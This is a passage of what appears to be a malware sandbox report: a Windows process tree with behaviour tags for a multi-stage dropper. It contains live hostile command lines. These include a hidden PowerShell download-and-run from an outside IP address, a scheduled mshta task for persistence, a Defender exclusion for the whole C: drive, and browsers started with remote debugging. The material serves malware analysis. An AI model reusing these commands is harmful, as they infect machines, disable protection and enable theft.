- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe"C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe"6⤵
- Executes dropped EXE
PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
-
C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe"C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3796
-
-
C:\Users\Admin\AppData\Local\Temp\10473260101\43ee895fb1.exe"C:\Users\Admin\AppData\Local\Temp\10473260101\43ee895fb1.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn XkTFvma3Vwx /tr "mshta C:\Users\Admin\AppData\Local\Temp\XpwJOH7Ch.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn XkTFvma3Vwx /tr "mshta C:\Users\Admin\AppData\Local\Temp\XpwJOH7Ch.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:932
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\XpwJOH7Ch.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Users\Admin\AppData\Local\Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE"C:\Users\Admin\AppData\Local\Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4396
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10473270101\dfaa94e428.exe"C:\Users\Admin\AppData\Local\Temp\10473270101\dfaa94e428.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe"C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe"C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1704 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1364
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4592
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4548
-
-
-
C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:4060 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4808 -
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4296 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1476 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9932edcf8,0x7ff9932edd04,0x7ff9932edd1011⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2012,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2004 /prefetch:211⤵PID:3976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2092,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2132 /prefetch:311⤵PID:1520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2556 /prefetch:811⤵PID:4700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3052,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3064 /prefetch:111⤵
- Uses browser remote debugging
PID:368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3080,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3112 /prefetch:111⤵
- Uses browser remote debugging
PID:1060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4228,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:211⤵
- Uses browser remote debugging
PID:4144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4668,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4660 /prefetch:111⤵
- Uses browser remote debugging
PID:4848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:811⤵PID:4448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5548,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5592 /prefetch:811⤵PID:5140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5376 /prefetch:811⤵PID:5488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5720,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5676 /prefetch:811⤵PID:5548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5736,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5612 /prefetch:811⤵PID:5588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5240,i,12362845459960481967,15227313676883810554,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5748 /prefetch:811⤵PID:5960
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
PID:5184 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch11⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5216 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff99376f208,0x7ff99376f214,0x7ff99376f22012⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1912,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:312⤵PID:6128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2196,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:212⤵PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2420,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=2788 /prefetch:812⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3556,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:112⤵
- Uses browser remote debugging
PID:5732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3532,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:112⤵
- Uses browser remote debugging
PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=1808,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4320 /prefetch:112⤵
- Uses browser remote debugging
PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4164,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:212⤵
- Uses browser remote debugging
PID:2808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4168,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:812⤵PID:1472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5124,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=3968 /prefetch:812⤵PID:932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4756,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:812⤵PID:1964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4752,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:812⤵PID:4628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:812⤵PID:5956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:812⤵PID:5612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6120,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:812⤵PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6180,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:812⤵PID:4744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6504,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:812⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6600,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:812⤵PID:208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6760,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6772 /prefetch:812⤵PID:1020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6920,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6928 /prefetch:812⤵PID:1860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7080,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6908 /prefetch:812⤵PID:5484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7112,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=7232 /prefetch:812⤵PID:5472
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4476 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6048
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:412 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:1924
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:5828
-
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10473320101\a244d4f733.exe"C:\Users\Admin\AppData\Local\Temp\10473320101\a244d4f733.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\10473330101\21b4bde783.exe"C:\Users\Admin\AppData\Local\Temp\10473330101\21b4bde783.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5196 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10473330101\21b4bde783.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe"C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe"6⤵
- Executes dropped EXE
PID:6972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2T1218.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2T1218.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4280
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
